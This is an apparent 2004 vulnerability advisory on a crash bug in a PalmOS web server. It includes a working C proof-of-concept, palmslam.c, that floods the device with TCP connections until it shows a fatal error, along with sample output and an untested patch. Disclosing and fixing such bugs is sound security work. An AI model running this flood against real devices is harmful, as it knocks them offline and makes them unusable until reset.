PalmOShttpd.txt

`Introduction  
#############  
  
'httpd' for PalmOS was originally written by Jim Rees,  
and is a simple webserver for Palm powered PDAs.   
Since the development of httpd for Palm stopped, I  
decided to modify 'httpd' slightly, and re-release it  
on freshmeat.net.   
However, httpd contains a bug which causes the device  
to crash due to a "Fatal Error". The slightly  
modified version of 'httpd' (called palmhttpd)  
contains the same bug as the original, as I used Jim's  
code.  
  
  
The bug  
########  
  
The bug allows an attacker to crash the entire device,  
causing a "Fatal Error", rendering the device unusable  
until it is reset completely. PalmOS can only handle  
1 client connection, but 'httpd' implements a while(1)  
loop to accept() connections forever. Because of  
this, httpd will accept more than 1 connection, which  
PalmOS literally CANNOT do. The result is a dialog  
box saying "Fatal Error, NetStack1.c overflowed  
accept queue", which "Reset" button.  
  
Below is the offending code:  
  
---from httpd.c  
  
[snip]  
while (1) { /* Cause of the bug is here!   
PalmOS can only accept 1 client connection! */  
if (f) {  
xclose(f);  
f = NULL;  
}  
if (fd >= 0) {  
close(fd);  
fd = -1;  
}  
  
/* Accept connections */  
len = sizeof saddr;  
AppNetTimeout = SysTicksPerSecond() * 1;  
if ((fd = accept(sfd, (struct sockaddr *)  
&saddr, &len)) < 0) {  
[snip]  
---  
  
Exploiting this DoS vulnerability will crash PalmOS  
INDEFINATELY.  
  
  
  
The exploit  
############  
  
Here is a PoC exploit for the issue:  
  
  
---palmslam.c  
/* PalmOS httpd accept queue overflow PoC exploit.  
* Compile: gcc palmslam.c -o palmslam  
*   
* -shaun2k2  
*/  
#include <stdio.h>  
#include <stdlib.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#define MAX_CON 1025  
int main(int argc, char *argv[]) {  
if(argc < 3) {  
printf("Usage: palmslam <host>  
<port>\n");  
exit(-1);  
}  
  
int sock[MAX_CON];  
int i;  
struct sockaddr_in dest[MAX_CON];  
struct hostent *host;  
if((host = gethostbyname(argv[1])) == -1) {  
printf("Couldn't resolve %s!\n",  
argv[1]);  
exit(-1);  
}  
  
for(i = 0; i <= MAX_CON; i++) {  
if((sock[i] = socket(AF_INET,  
SOCK_STREAM, 0)) == -1) {  
printf("Couldn't create  
socket!\n");  
exit(-1);  
}  
  
dest[i].sin_family = AF_INET;  
dest[i].sin_port =  
htons(atoi(argv[2]));  
dest[i].sin_addr = *((struct in_addr  
*)host->h_addr);  
  
if(connect(sock[i], (struct sockaddr  
*)&dest[i], sizeof(struct sockaddr)) == -1) {  
printf("Couldn't connect to %s  
on port %s!\n", argv[1], argv[2]);  
exit(-1);  
}  
  
printf("%d : Connected!\n", i);  
}  
return(0);  
}  
---  
  
I connected my Sony CLIE to the net via a simple pppd  
script, ran palmhttpd, and ran the PoC exploit against  
it:  
  
---  
[root@localhost DoS]# ./palmslam 6X.XX.68.XX 80  
0 : Connected!  
1 : Connected!  
2 : Connected!  
---  
  
  
At this point, my CLIE's screen presented me with the  
dialog box.  
  
  
+---------------------------------------+  
| Fatal Error |   
|---------------------------------------|   
| |  
| |  
| Fatal Alert NetStack1.c, Line 4XXX, |  
| overflowed accept queue |   
| |  
| |  
| |  
| |  
| +-----------------+ |  
| | Reset | |  
| +-----------------+ |   
| |  
|---------------------------------------+  
  
  
  
The fix  
########  
  
I have written a simple patch to fix the issue:  
  
---httpd.patch  
--- httpd.c 2004-01-14 17:21:41.000000000 +0000  
+++ httpd.1.c 2004-02-08 17:13:33.000000000 +0000  
@@ -391,8 +391,15 @@  
NetLibAddrINToA(AppNetRefnum,  
ifinfo.param.interfaceInfo.ipAddr, host);  
printf("Listening on %s\n", host);  
  
- while (1) {  
- if (f) {  
+ /* Here is where the bug manifests: PalmOS can  
only take 1 client  
+ * connection (according to even the PalmOS  
programming documentation),  
+ * but this loop accept()s connections forever.   
The loop is now commented  
+ * out, fixing the bug.  
+ * -Shaun2k2  
+ */  
+  
+ /*while (1) {*/  
+ if (f) {  
xclose(f);  
f = NULL;  
}  
@@ -507,7 +514,7 @@  
}  
  
printf("stopped\n");  
-}  
+/*}*/  
  
char html0[] = "HTTP/1.0 200 OK\nMIME-version:  
1.0\nContent-type: %s\n\n";  
---  
  
Apply the patch: patch httpd.c httpd.patch  
  
Type 'make' to recompile httpd. Although I haven't  
tested the patch, I assume it works. Let me know if  
it does not.  
  
I will be uploading a patched version of palmhttpd to  
freshmeat.net.  
  
  
Credit  
#######  
  
This vulnerability was discovered by shaun2k2 / Shaun  
Colley.  
  
  
  
Thank you for your time.  
Shaun.  
  
  
  
  
  
  
  
  
___________________________________________________________  
BT Yahoo! Broadband - Free modem offer, sign up online today and save £80 http://btyahoo.yahoo.co.uk  
`